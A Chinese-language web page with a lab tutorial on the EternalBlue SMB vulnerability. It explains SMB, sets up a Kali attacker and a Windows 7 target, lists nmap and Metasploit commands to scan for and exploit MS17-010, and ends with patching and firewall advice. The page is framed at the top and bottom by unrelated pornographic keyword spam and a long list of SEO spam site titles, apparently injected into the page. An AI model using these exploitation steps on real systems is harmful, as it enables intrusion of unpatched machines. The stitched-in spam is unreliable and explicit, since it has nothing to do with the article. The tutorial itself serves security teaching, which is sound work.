公交车上荫蒂添的好舒服的电影-公用玩物(np双xing总受)-公用小荡货芊芊-公与妇仑乱hd-攻把受做哭边走边肉楼梯play-古装一级淫片a免费播放口

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發(fā)文檔 其他文檔  
 
網(wǎng)站管理員

【W(wǎng)eb滲透】永恒之藍,勒索病毒的力量來源

admin
2024年1月9日 10:52 本文熱度 1258

一:介紹


1.什么是永恒之藍。

永恒之藍(Eternal Blue)爆發(fā)于2017年4月14日晚,是一種利用Windows系統(tǒng)的SMB協(xié)議漏洞來獲取系統(tǒng)的最高權(quán)限,以此來控制被入侵的計算機。甚至于2017年5月12日, 不法分子通過改造“永恒之藍”制作了wannacry勒索病毒,使全世界大范圍
內(nèi)遭受了該勒索病毒,甚至波及到學校、大型企業(yè)、政府等機構(gòu),只能通過支付高額的贖金才能恢復出文件。不過在該病毒出來不久就被微軟通過打補丁修復。


2.SMB協(xié)議介紹。

SMB(ServerMessage Block)通信協(xié)議是微軟(Microsoft)和英特爾(Intel)在1987年制定的協(xié)議,主要是作為Microsoft網(wǎng)絡(luò)的通訊協(xié)議。SMB 是在會話層(session layer)和表示層(presentation layer)以及小部分應(yīng)用層(application layer)的協(xié)議。SMB使用了NetBIOS的應(yīng)用程序接口 (Application Program Interface,簡稱API),一般端口使用為139,445。


3.SMB會話生命階段。

1) SMB協(xié)議協(xié)商(Negotiate)

在一個SMB還沒有開始的時候,由客戶端率先發(fā)出一個協(xié)商請求。在請求中,客戶端會列出所有它所支持協(xié)議版本以及所支持的一些特性(比如加密Encryption、持久句柄Persistent Handle、客戶端緩存Leasing等等)。而服務(wù)端在回復中則會指定一個SMB版本且列出客戶端與服務(wù)端共同支持的特性。


2)建立SMB會話(Session Setup)

客戶端選擇一個服務(wù)端支持的協(xié)議來進行用戶認證,可以選擇的認證協(xié)議一般包括NTLM、Kerberos等。按照選擇的認證協(xié)議的不同,這個階段可能會進行一次或多次SESSION_SETOP請求/回復的網(wǎng)絡(luò)包交換。


3)連接一個文件分享(Tree Connect)

在會話建立之后,客戶端會發(fā)出連接文件分享的請求。源于文件系統(tǒng)的樹形結(jié)構(gòu),該請求被命名為樹連接(Tree Connect)。以SMB協(xié)議的阿里云NAS為例,一般的SMB掛載命令為:net use z: \\XXX.nas.aliyuncs.com\myshare其中的“ \\XXX.nas.aliyuncs.com\myshare”便是我們將要連接的那個文件分享,也便是那棵“樹”。如果在“myshare”中創(chuàng)建有子目錄“abc”,那直接連接“abc”這棵子樹也是可以的:net use z: \\XXX.nas.aliyuncs.com\myshare\abc


4) 文件系統(tǒng)操作

在文件分享連接成功之后,用戶通過SMB客戶端進行真正的對于目標文件分享的業(yè)務(wù)操作。這個階段可以用到的指令有CREATE、CLOSE、FLUSH、READ、WRITE、SETINFO、GETINFO等等。


5)斷開文件分享連接(Tree Disconnect)

當一個SMB會話被閑置一定時間之后,Windows會自動斷開文件分享連接并隨后中止SMB會話。這個閑置時間可以通過Windows注冊表進行設(shè)定。當然,用戶也可以主動發(fā)起斷開連接請求。


6)終止SMB會話(Logoff)

當客戶端發(fā)出會話中止請求并得到服務(wù)端發(fā)回的中止成功的回復之后,這個SMB會話至此便正式結(jié)束了。


二.實驗環(huán)境。


1.環(huán)境介紹。

攻擊機:kali:ip:192.168.248.128
靶機:windows7專業(yè)版:ip:192.168.248.130


2.工具介紹:

Metasploit:

Metasploit框架(簡稱MSF)是一個開源工具,旨在方便滲透測試,它是由Ruby程序語言編 寫的模板化框架,具有很好的擴展性,便于滲透測試人員開發(fā),使用定制的工具模板。該工具有六個模塊,分別為輔助模塊(auxiliary)、滲透攻擊模塊(exploits)、后滲透攻擊模塊(post)、攻擊載荷模塊(payloads)、空指令模塊(nops)、編碼器模塊(encoders),其中msf為總模塊,其他均為分支模塊。此工具集成在kali中。其中auxiliary/scanner/smb/smb_ms17_010是永恒之藍掃描模塊,exploit/windows/smb/ms17_010_eternalblue是永恒之藍攻擊代碼,一般配合使用,前者先掃描,若顯示有漏洞,再進行攻擊。


三.實驗步驟。


1.確定連通

用kali中ping命令測試。


2.查看靶機開放端口。

nmap -r 192.168.248.130

確定端口開放。


3.進入msf。

1)使用auxiliary模塊。

use auxiliary/scanner/smb/smb_ms17_010

2)查看需要配置的信息

show  options

3)設(shè)置攻擊目標及端口

set rhosts 192.168.248.130
set rport 445

經(jīng)測試后發(fā)現(xiàn)存在漏洞。

4)使用exploit/windows/smb/ms17_010_eternalblue進行攻擊。

use exploit/windows/smb/ms17_010_eternalblue

至此漏洞利用結(jié)束。

三.永恒之藍防護

1)禁用SMB協(xié)議

2)打開Windows Update,或手動安裝補丁

3)使用防火墻阻止445端口的連接,或者使用進/出站規(guī)則阻止445端口的連接

4)不要隨意打開陌生的文件

4)安裝殺毒軟件,及時更新病毒庫


該文章在 2024/12/16 11:03:56 編輯過
關(guān)鍵字查詢
相關(guān)文章
正在查詢...
點晴ERP是一款針對中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國內(nèi)大量中小企業(yè)的青睞。
點晴PMS碼頭管理系統(tǒng)主要針對港口碼頭集裝箱與散貨日常運作、調(diào)度、堆場、車隊、財務(wù)費用、相關(guān)報表等業(yè)務(wù)管理,結(jié)合碼頭的業(yè)務(wù)特點,圍繞調(diào)度、堆場作業(yè)而開發(fā)的。集技術(shù)的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。
點晴WMS倉儲管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質(zhì)期管理,貨位管理,庫位管理,生產(chǎn)管理,WMS管理系統(tǒng),標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務(wù)都免費,不限功能、不限時間、不限用戶的免費OA協(xié)同辦公管理系統(tǒng)。
Copyright 2010-2025 ClickSun All Rights Reserved

主站蜘蛛池模板: 国产精品福利 | 国产综合精品一区二区 | 精品无码中文字幕 | 成人一区在线观看 | 国产精品免费小视频 | 国产高清精品一区在线 | 国产尤物精品自在拍视频首页 | 国产免费一区二区三区在线 | 国产精品午夜福利在线观看网站 | 成人欧美一区二区三区白人 | 国产福利片 | av秋霞电影在线播 | 成人午夜电影免费完整在线看 | 国产精品一区二区三久久不卡 | 91精品国产乱码在线观看 | 精品国产一区二区在线 | 岛国av无码免费 | 国产成年人免费视频 | 精品国产sm最大网站麻豆 | 国产极品精频在线观 | 国产精品精华液网站 | 2025午夜国产精品福利 | 精品亚洲一区国产精品 | 精品国产亚洲第一区二 | 国产高清吃奶成免费视频网站 | 国产91福利在线精品剧 | 国产午夜一级毛片 | 99久久婷婷国产综合精品免费 | 91精品国产全国免费观看蜜桃 | 国产精品福利区一区二区三区四 | 国产一区二区免费 | 国产欧美久久久久久精 | 91国产在线 | 国产一区二区美女自卫 | 国产艳妇av在线出轨 | 国产精品女同久久久 | 国产超碰人人做人人爽www | 国产精品成人久久久久久久 | 91亚洲最新精品 | 3d动漫精品啪啪一区二区 | 丰满少妇精品无码专区 |